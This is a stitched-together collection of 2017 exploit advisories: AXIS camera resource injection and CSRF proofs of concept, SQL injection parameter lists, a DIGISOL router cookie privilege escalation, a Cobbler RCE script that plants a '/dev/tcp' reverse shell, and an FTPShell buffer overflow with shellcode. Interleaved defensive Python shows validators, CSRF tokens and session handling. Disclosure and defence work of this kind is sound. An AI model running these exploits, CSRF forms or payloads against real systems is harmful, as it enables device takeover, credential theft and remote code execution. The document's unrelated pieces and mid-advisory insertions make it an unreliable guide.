456 var searchStr = "size=<!--#echo var="size" option="encoding:javascript" -->"
457 var replaceStr = "size=" + size
458 var re = new RegExp(searchStr , "g")
459 url = url.replace(re, replaceStr)
460 }
461
462 document.location = url;
463 }
464
465 var aNewImagePath;
466
467 function reloadPage()
468 {
469 document.location = aNewImagePath;
470 }
471
[ SNIP ]
567 aNewImagePath = '/view/view.shtml?id=<!--#echo var="ssi_request_id" option="encoding:url" -->&imagePath=' + escape(imagePath) + size;
568 if (other != null)
569 aNewImagePath += other;
570 <!--#if expr="$ptzpresets = yes" -->
571 /* append preset parameters so that preset postion is selected in drop down list after reload */
572 if (presetName != '')
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
574 else if (gotopresetname != '')
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
576
577 if( newCamera != '')
578 aNewImagePath += "&camera=" + escape(newCamera);
---*---
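The snips above show the parameter landing in video(...), DrawTB(...) and var imagepath = "..." unchanged. As an added example (not Orwelllabs' code and not AXIS firmware), here is the server-side check that would have closed the hole together with a detector that runs the same check over access-log lines. ALLOWED_TOP_DIRS is an assumed allow-list of stream paths the camera serves, and the log lines are constructed, with the advisory's host and a protocol-relative variant of the injection.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Stream paths the camera itself serves; an assumed allow-list for this example,
# not taken from the AXIS firmware.
ALLOWED_TOP_DIRS = {"mjpg", "axis-cgi", "view"}


def is_safe_image_path(value: str) -> bool:
    """Accept only a root-relative path on the camera's own origin.

    The page drops the parameter straight into video(...), DrawTB(...) and
    var imagepath = "..."; anything carrying a scheme or host, including the
    protocol-relative "//host" form, makes the browser fetch from the attacker.
    """
    if not value or "\x00" in value or "\r" in value or "\n" in value:
        return False
    if "\\" in value:  # browsers treat a backslash like a slash when parsing URLs
        return False
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return False
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return False
    return parts.path.split("/")[1] in ALLOWED_TOP_DIRS


# Combined-log-format request line; enough to pull the target out of an access log
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/1\.[01]"')


def find_injection_attempts(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (request target, offending value) for every request whose imagepath
    parameter (any letter case) would not pass is_safe_image_path()."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        for key, values in parse_qs(urlsplit(target).query).items():
            if key.lower() != "imagepath":
                continue
            for v in values:
                if not is_safe_image_path(v):
                    hits.append((target, v))
    return hits


# Constructed access-log lines: one legitimate view, two injection attempts
# (the advisory's host, then a protocol-relative variant) and an unrelated request.
SAMPLE_LOG = [
    '192.0.2.10 - Winst0n [12/Mar/2017:10:00:01 +0000] "GET /view.shtml?imagepath=/mjpg/video.mjpg?resolution=640x480 HTTP/1.1" 200 5120',
    '198.51.100.7 - Winst0n [12/Mar/2017:10:00:09 +0000] "GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1" 200 5180',
    '198.51.100.7 - Winst0n [12/Mar/2017:10:00:15 +0000] "GET /view.shtml?imagePath=//www.3vilh0st.com/evilcode.html HTTP/1.1" 200 5180',
    '192.0.2.11 - - [12/Mar/2017:10:01:00 +0000] "GET /incl/activeX.js?id=69 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for target, value in find_injection_attempts(SAMPLE_LOG):
        print("[!] imagepath injection attempt: %s (value %r)" % (target, value))
```

The validator deliberately refuses "javascript:" and "data:" values as well, since the same parameter is reflected into script context and the XSS the advisory mentions is the other face of the same missing check.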
Some legitimate features can be very interesting to cybercriminals and their
ransomware/botnets/bitcoin miners/backdoors/malware. One such feature is the
"Open Script Editor": through it the user can edit any file on the operating
system with root privileges, because (on most IoT devices) everything runs as
root. This is another dangerous point to keep in mind.
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
One could say that this feature is restricted to the administrator of the
camera, and that would be true if customers were forced to change the default
password during the setup phase under a strong password policy, since changing
"pass" to "pass123" does not solve the problem. The aggravating factor is that
there are thousands of these products reachable on the internet, running with
default credentials.
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the manufacturer, the resource injection vulnerability was fixed
in firmware 5.60, but we found that the problem still occurred in 5.80.x
versions of various product models. Check for updates on the manufacturer's
website.
Regarding the Open Script Editor, it was considered that access to this feature
requires authentication as an admin, but if there is no policy forcing the
customer to change the password during product setup (ease vs. security) and
requiring password complexity, needing an administrative credential to abuse
the functionality is not exactly an impediment (e.g. botnets that embed in
their code a list of default credentials for that type of device).
Credits
=======
These vulnerabilities have been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
0RWELLL4BS
**********
security advisory
olsa-CVE-2015-8255
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Cross-Site Request Forgery / Session Management [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1
Technical Details
=================
Because of the (bad) design of this kind of device (actually one of the big
problems of IoT), the embedded web application does not verify whether a
request was intentionally submitted by the authenticated user.
PoCs
====
#-> Setting root password to W!nst0n
<html>
<!-- CSRF PoC Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="pwd" value="w!nst0n" />
<input type="hidden" name="comment" value="Administrator" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Adding new credential SmithW:W!nst0n
<html>
<!-- CSRF PoC - Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="user" value="SmithW" />
<input type="hidden" name="sgrp"
value="viewer:operator:admin:ptz" />
<input type="hidden" name="pwd" value="W!nst0n" />
<input type="hidden" name="grp" value="users" />
<input type="hidden" name="comment" value="WebUser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Deleting an app via directly CSRF (axis_update.shtml)
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
[Many actions allowed to a user (all of them?) can be forged in this way.]
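The PoCs above work because pwdgrp.cgi accepts a password change from a plain GET form on a foreign page with nothing but the browser's cookie or Digest credentials attached. As an added example (not Orwelllabs' code and not anything from the AXIS firmware), here is the request-validation logic that defeats each of them, applied to the same form fields the first PoC sends. CAMERA_ORIGIN, SERVER_KEY and the session id are constructed values.

```python
import hashlib
import hmac
from typing import Mapping, Tuple
from urllib.parse import urlsplit

# Assumed address of the camera's web UI; the PoCs above write xxx.xxx.xxx.xxx
CAMERA_ORIGIN = "http://192.0.2.50"
STATE_CHANGING_METHODS = {"POST", "PUT", "DELETE"}


def issue_csrf_token(session_id: str, server_key: bytes) -> str:
    """Per-session synchronizer token: HMAC of the session id under a server-side
    key, embedded in the camera's own forms and unreadable from another origin."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(method: str, headers: Mapping[str, str], form: Mapping[str, str],
                       session_id: str, server_key: bytes,
                       expected_origin: str = CAMERA_ORIGIN) -> Tuple[bool, str]:
    """Decide whether a state-changing request to pwdgrp.cgi and friends is genuine.

    Three independent checks, any one of which defeats the forms above:
    1. state changes are accepted over POST only (the PoCs are plain GET forms);
    2. the Origin header, or Referer when Origin is absent, must name the camera;
    3. the form must carry the token issued for this session.
    """
    if method.upper() not in STATE_CHANGING_METHODS:
        return False, "state-changing action requested with %s; POST required" % method.upper()

    lowered = {k.lower(): v for k, v in headers.items()}
    source = lowered.get("origin") or lowered.get("referer")
    if not source:
        return False, "no Origin or Referer header"
    src, exp = urlsplit(source), urlsplit(expected_origin)
    if (src.scheme, src.netloc) != (exp.scheme, exp.netloc):
        return False, "cross-origin request from %s" % source

    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id, server_key)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed values: a server key, a session, and the fields of the first PoC form
SERVER_KEY = b"constructed-server-key-rotate-me"
SESSION = "sess-0rw3ll"
RESET_ROOT = {"action": "update", "user": "root", "pwd": "w!nst0n", "comment": "Administrator"}

if __name__ == "__main__":
    poc = is_request_allowed("GET", {"Referer": "http://attacker.example/csrf.html"},
                             RESET_ROOT, SESSION, SERVER_KEY)
    genuine = is_request_allowed(
        "POST", {"Origin": CAMERA_ORIGIN},
        dict(RESET_ROOT, csrf_token=issue_csrf_token(SESSION, SERVER_KEY)),
        SESSION, SERVER_KEY)
    print("PoC form :", poc)
    print("UI form  :", genuine)
```

The Origin check alone is not enough on a device like this, because some clients send neither Origin nor Referer and the camera would then have to choose between breaking them and accepting the request blind; the token is what makes the decision independent of what the browser chose to send.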
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
This is a very old design problem of this kind of device; there is nothing new
to say about that.
Credits
=======
These vulnerabilities have been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
# # # # #
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
# Google Dork: N/A
# Date: 17.03.2017
# Vendor Homepage: http://webstarslab.com
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
# Demo: http://webstarslab.com/departmental-store-management-system/store/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
# tbl_users:id
# tbl_users:username
# tbl_users:password
# tbl_users:email
# tbl_users:full_name
# tbl_users:permission
# Etc..
# # # # #
#!/usr/bin/python
"""
# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805
Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.
Vulnerability Description
=========================
Authenticated RCE
"""
import uuid
import sys
import requests
# Custom variables
cobbler_server = 'http://192.168.2.235/cobbler_web/'
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'
# Cobbler variables
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]
class Cobbler():
def __init__(self):
self.client = requests.session()
self.client.get('%s' % cobbler_server)
self.csrftoken = self.client.cookies['csrftoken']
self.headers = dict(Referer=cobbler_url)
self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
self.client.post(cobbler_url, data=self.login_data, headers=self.headers)
def create_repo(self):
print("Creating dummy repository...")
self.repoinfo = dict(
csrfmiddlewaretoken=self.csrftoken,
editmode='new',
subobject='False',
submit='Save',
arch='i386',
breed='yum',
comment='',
keep_updated='',
mirror='',
name=cobbler_repo_name,
owners='admin',
rpm_list='',
proxy='',
apt_components='',
apt_dists='',
createrepo_flags='',
environment='',
mirror_locally='',
priority='99',
yumopts='')
self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)
def post_payload(self):
print("Configuring reposync flags with the payload...")
self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)
def get_shell(self):
self.create_repo()
self.post_payload()
print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)
if __name__ == '__main__':
cobbler = Cobbler()
cobbler.get_shell()
sys.exit()
print('''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
# Date: 2017.03.17
# Exploit Author: Greg Priest
# Version: FTPShell Client 6.53
# Tested on: Windows7 x64 HUN/ENG Professional
''')

a = b"A" * 460                    # padding up to the saved return address
b = b'\xDC\xE8\x65\x76'           # return address, little-endian 0x7665E8DC
nop = b'\x90' * 10                # NOP sled in front of the shellcode
c = b"C" * 1638                   # trailing filler
#calc.exe
shellcode = (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
    b"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
    b"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
    b"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75"
    b"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    b"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
    b"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53"
    b"\x53\x53\x53\x53\x52\x53\xff\xd7")
evilstring = a + b + nop + shellcode + c
# written as raw bytes; paste the contents into the Session name field
with open('evilstring.txt', "wb") as file:
    file.write(evilstring)
print(evilstring)
# # # # #
# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://turnkeycentral.com/scripts/social-dating-script/
# Demo: http://demo.turnkeycentral.com/ifdate/index.php
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members_search_results.php?gender=[SQL]
# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]
# http://localhost/[PATH]/members_search_results.php?marital=[SQL]
# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]
# http://localhost/[PATH]/members_search_results.php?country=[SQL]
# http://localhost/[PATH]/members_search_results.php?picture=[SQL]
# http://localhost/[PATH]/members_search_results.php?online=[SQL]
# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]
# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]
# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]
# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]
# http://localhost/[PATH]/my_profile.php?username=[SQL]
# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]
# members :id
# members :username
# members :email
# members :password
# members :signup_date
# members :signup_ip
# members :banned
# members :active
# members :is_admin
# Etc..
# # # # #
Title:
======
Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.
CVE Details:
============
CVE-2017-6896
Reference:
==========
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896
https://vuldb.com/sv/?id.97954
https://www.indrajithan.com/DIGISOL_router_previlage_escaltion
Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Date:
====
13-03-2017
Vendor:
======
DIGISOL routers are products of Smartlink Network Systems Ltd., one of India's leading networking companies, established in 1993 to serve the Indian market in the field of network infrastructure.
Product:
=======
DIGISOL DG-HR1400 is a wireless Router
Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf
Abstract details:
=================
A privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker to escalate from user to admin privileges just by modifying the Base64-encoded session cookie value.
Affected Version:
=============
<=1.00.02
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
8
Proof Of Concept :
==================
1) Log in to the router as a User; the router sets the session cookie value to VVNFUg== (the Base64 encoding of "USER").
2) Encode "ADMIN" to Base64 and set the session cookie value to QURNSU4=.
3) Refresh the page; your USER privileges are now escalated to ADMIN.
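The three steps above amount to the server reading the role out of a value the client controls. As an added example (not the router's firmware and not Indrajith.A.N's work), the block below reproduces the vulnerable cookie handling so the VVNFUg== / QURNSU4= values can be checked, and puts next to it the fix a senior engineer would choose: an opaque random session id whose role is kept server-side, so editing the cookie can only yield an unknown id. Everything here is constructed for the demonstration.

```python
import base64
import secrets
from typing import Dict, Optional

# --- what the router does: the cookie is nothing but base64(role) ---------------

def encode_role_cookie(role: str) -> str:
    """Produces VVNFUg== for "USER" and QURNSU4= for "ADMIN", the values from the PoC."""
    return base64.b64encode(role.encode()).decode()


def role_from_router_cookie(cookie: str) -> Optional[str]:
    """Vulnerable: the role is read straight out of client-controlled data,
    so whoever can edit the cookie picks their own role."""
    try:
        return base64.b64decode(cookie, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None


# --- hardened form: opaque session id, role kept server-side -------------------

class SessionStore:
    """The cookie becomes a random, unguessable handle; the role lives in a table
    the client can never write to. A tampered cookie maps to no session at all,
    and there is nothing in it worth decoding."""

    def __init__(self) -> None:
        self._roles: Dict[str, str] = {}

    def create(self, role: str) -> str:
        session_id = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._roles[session_id] = role
        return session_id

    def role_for(self, cookie: Optional[str]) -> Optional[str]:
        if not cookie:
            return None
        return self._roles.get(cookie)

    def destroy(self, cookie: str) -> None:
        self._roles.pop(cookie, None)


if __name__ == "__main__":
    forged = encode_role_cookie("ADMIN")
    print("router accepts forged cookie as:", role_from_router_cookie(forged))
    store = SessionStore()
    cookie = store.create("USER")
    print("store: own cookie ->", store.role_for(cookie), "; forged ->", store.role_for(forged))
```

Mark the real cookie HttpOnly and, once the router speaks HTTPS, Secure; neither flag would have helped against this bug, but they stop the handle from being stolen the way the role was forged.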
Disclosure Timeline:
======================================
Vendor Notification: 13/03/17
# # # # #
# Exploit Title: Omegle Clone - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://www.turnkeycentral.com/scripts/omegle-clone/
# Demo: http://demo.turnkeycentral.com/omegleclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/randomChat.php?userId=[SQL]
# http://localhost/[PATH]/listenToReceive.php?userId=[SQL]
# http://localhost/[PATH]/typing.php?userId=[SQL]
# http://localhost/[PATH]/isTyping.php?strangerId=[SQL]
# http://localhost/[PATH]/saveLog.php?userId=[SQL]
# pc_settings :AdminID
# pc_settings :AdminPass
# pc_settings :Email
# pc_settings :PayPal
# pc_settings :IpnMode
# Etc..
# # # # #
# # # # #
# Exploit Title: Secure Download Links - SQL Injection
# Google Dork: N/A
# Date: 19.03.2017
# Vendor Homepage: http://sixthlife.net/
# Software: http://sixthlife.net/product/secure-download-links/
# Demo: http://www.satyamtechnologies.net/secdown/example.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?dc=[SQL]
# # # # #